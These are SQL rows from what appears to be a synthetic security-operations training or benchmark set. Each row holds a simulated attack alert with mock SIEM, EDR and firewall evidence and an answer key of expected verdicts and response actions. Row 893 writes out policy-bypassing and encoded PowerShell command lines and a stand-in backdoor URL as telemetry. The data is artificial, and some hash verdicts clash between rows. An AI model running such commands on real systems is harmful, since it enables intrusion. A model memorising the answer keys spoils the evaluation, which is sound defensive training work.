(888, 'Lateral Movement to Critical Systems', 'high', 'Network traffic analysis', 'Anomalous network traffic detected indicative of internal reconnaissance activity. The attacker appears to be mapping out critical systems, likely preparing for further lateral movement and potential data exfiltration.', 'Internal Reconnaissance', 'T1049: System Network Connections Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:28Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.12\",\"protocol\":\"TCP\",\"destination_port\":445,\"user\":\"jdoe\",\"file_accessed\":\"critical_data.xlsx\",\"external_ip\":\"203.0.113.45\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"access_attempt\",\"status\":\"failed\",\"reason\":\"access_denied\"}', '2026-01-15 00:57:25', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Known internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Critical system IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"suspicious\",\"details\":\"IP address associated with previous reconnaissance activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"clean\",\"details\":\"Commonly occurring hash, likely not malicious.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"critical_data.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_inventory\",\"verdict\":\"internal\",\"details\":\"Sensitive file containing critical 
data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(889, 'Exfiltration of HackerOne Reports', 'critical', 'Data transfer logs', 'Targeting vulnerability reports, the attackers extract sensitive information, including zero-day vulnerabilities.', 'Data Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:32:45Z\",\"source_ip\":\"10.54.23.101\",\"destination_ip\":\"192.168.1.15\",\"external_ip\":\"185.213.211.156\",\"user\":\"jdoe\",\"filename\":\"HackerOne_Report_Sept2023.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"exfiltration\",\"destination_port\":443,\"protocol\":\"HTTPS\"}', '2026-01-15 00:57:25', '2026-02-16 17:56:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.54.23.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in suspicious data transfer.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.213.211.156\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous data breaches.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"HackerOne_Report_Sept2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive vulnerability information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_repository\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with suspicious file activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity\",\"verdict\":\"suspicious\",\"details\":\"Unusual data access patterns detected for this 
user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.564Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.54.23.101\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"185.213.211.156\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"HackerOne_Report_Sept2023.zip\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.564Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.54.23.101\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"185.213.211.156\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"HackerOne_Report_Sept2023.zip\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.564Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.54.23.101\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"185.213.211.156\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"HackerOne_Report_Sept2023.zip\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.564Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.54.23.101\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"185.213.211.156\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"HackerOne_Report_Sept2023.zip\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.564Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.54.23.101\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"185.213.211.156\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"HackerOne_Report_Sept2023.zip\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(890, 'Cover Tracks Using Log Tampering', 'high', 'System logs', 'Advanced log manipulation detected. Attackers altered log entries to erase digital footprints. Obfuscation tactics employed to hinder detection and response efforts.', 'Defense Evasion', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:18Z\",\"event_id\":1102,\"event_source\":\"Microsoft-Windows-Eventlog\",\"log_name\":\"Security\",\"message\":\"The audit log was cleared.\",\"user\":{\"account_name\":\"admin_user\",\"account_domain\":\"CORP\",\"logon_id\":\"0x3e7\"},\"network\":{\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\"},\"file\":{\"file_name\":\"evtx_log_clear.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-01-15 00:57:25', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal source IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious external IP associated with APT activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with log tampering tool\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"evtx_log_clear.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"corporate_policy\",\"verdict\":\"suspicious\",\"details\":\"Unauthorized software used for log manipulation\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:18Z\\\",\\\"event_id\\\":1102,\\\"event_source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"The audit log was cleared.\\\",\\\"user\\\":{\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CORP\\\",\\\"logon_id\\\":\\\"0x3e7\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"file_name\\\":\\\"evtx_log_clear.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:18Z\\\",\\\"event_id\\\":1102,\\\"event_source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"The audit log was cleared.\\\",\\\"user\\\":{\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CORP\\\",\\\"logon_id\\\":\\\"0x3e7\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"file_name\\\":\\\"evtx_log_clear.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:18Z\\\",\\\"event_id\\\":1102,\\\"event_source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"The audit log was cleared.\\\",\\\"user\\\":{\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CORP\\\",\\\"logon_id\\\":\\\"0x3e7\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"file_name\\\":\\\"evtx_log_clear.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:18Z\\\",\\\"event_id\\\":1102,\\\"event_source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"The audit log was cleared.\\\",\\\"user\\\":{\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CORP\\\",\\\"logon_id\\\":\\\"0x3e7\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"file_name\\\":\\\"evtx_log_clear.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:18Z\\\",\\\"event_id\\\":1102,\\\"event_source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"The audit log was 
cleared.\\\",\\\"user\\\":{\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CORP\\\",\\\"logon_id\\\":\\\"0x3e7\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"file_name\\\":\\\"evtx_log_clear.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(891, 'Final Stage: Public Disclosure and Exploitation', 'critical', 'Public forums and dark web', 'Lapsus$ has publicly disclosed stolen information, causing significant reputational harm to Uber. The data was released on multiple platforms, making it accessible to a wide audience, potentially leading to financial losses and further exploitation.', 'Information Operations', 'T1583 - Data Leak Sites', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"185.220.101.5\",\"internal_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"exfiltrated_filename\":\"uber_customer_data.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"forum_url\":\"http://darkwebforum.example/disclosure/uber-leak\",\"malicious_actor\":\"Lapsus$\",\"action\":\"Data Public Disclosure\",\"target\":\"Uber\"}', '2026-01-15 00:57:25', '2026-02-16 17:56:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.220.101.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP used by Lapsus$ for malicious operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with leaked Uber data.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://darkwebforum.example/disclosure/uber-leak\",\"is_critical\":true,\"osint_result\":{\"source\":\"Dark Web Monitoring\",\"verdict\":\"malicious\",\"details\":\"URL hosting the leaked Uber data.\"}}],\"recommended_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.567Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.220.101.5\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_filename\\\":\\\"uber_customer_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"forum_url\\\":\\\"http://darkwebforum.example/disclosure/uber-leak\\\",\\\"malicious_actor\\\":\\\"Lapsus$\\\",\\\"action\\\":\\\"Data Public Disclosure\\\",\\\"target\\\":\\\"Uber\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.567Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.220.101.5\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_filename\\\":\\\"uber_customer_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"forum_url\\\":\\\"http://darkwebforum.example/disclosure/uber-leak\\\",\\\"malicious_actor\\\":\\\"Lapsus$\\\",\\\"action\\\":\\\"Data Public Disclosure\\\",\\\"target\\\":\\\"Uber\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.567Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.220.101.5\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_filename\\\":\\\"uber_customer_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"forum_url\\\":\\\"http://darkwebforum.example/disclosure/uber-leak\\\",\\\"malicious_actor\\\":\\\"Lapsus$\\\",\\\"action\\\":\\\"Data Public Disclosure\\\",\\\"target\\\":\\\"Uber\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.567Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.220.101.5\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_filename\\\":\\\"uber_customer_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"forum_url\\\":\\\"http://darkwebforum.example/disclosure/uber-leak\\\",\\\"malicious_actor\\\":\\\"Lapsus$\\\",\\\"action\\\":\\\"Data Public Disclosure\\\",\\\"target\\\":\\\"Uber\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.567Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.220.101.5\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_filename\\\":\\\"uber_customer_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"forum_url\\\":\\\"http://darkwebforum.example/disclosure/uber-leak\\\",\\\"malicious_actor\\\":\\\"Lapsus$\\\",\\\"action\\\":\\\"Data Public Disclosure\\\",\\\"target\\\":\\\"Uber\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(892, 'Suspicious Login Detected on DevOps Engineer\'s Home Network', 'high', 'Network logs', 'An unauthorized login attempt was detected from an external IP address on the DevOps engineer\'s home network. The attacker exploited weak credentials to gain initial access, potentially targeting corporate assets.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"devops_admin\",\"login_status\":\"successful\",\"method\":\"SSH\",\"reason\":\"Weak password\",\"device\":\"HomeRouter\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"filename\":\"malicious_payload.sh\"}', '2026-01-15 00:59:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actor activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Home network device\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"devops_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Username targeted by brute force attempts\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious payloads.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_payload.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Filename used in previous 
attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(893, 'Malicious Script Execution Identified on Compromised Machine', 'high', 'Endpoint Detection and Response (EDR) alerts', 'A custom script was executed on a compromised machine to install a backdoor for persistent access and command execution. The script was executed by an unauthorized process, indicating advanced attacker capabilities.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:28Z\",\"event_id\":\"EDR-20231015-00234\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"compromised-host\",\"user_name\":\"john.doe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"file_hash\":\"3f1c5a7b2c4f8e9d5f6e7b8c9d10e2a3\",\"attacker_ip\":\"203.0.113.45\",\"attacker_domain\":\"malicious-actor.com\",\"attacker_url\":\"http://malicious-actor.com/backdoor\",\"file_path\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\"}', '2026-01-15 00:59:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of the compromised host within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f1c5a7b2c4f8e9d5f6e7b8c9d10e2a3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with well-known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-actor.com/backdoor\",\"is_critical\":false,\"osint_result\":{\"source\":\"Open Source 
Intelligence\",\"verdict\":\"suspicious\",\"details\":\"URL linked to suspicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to establish backdoor access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
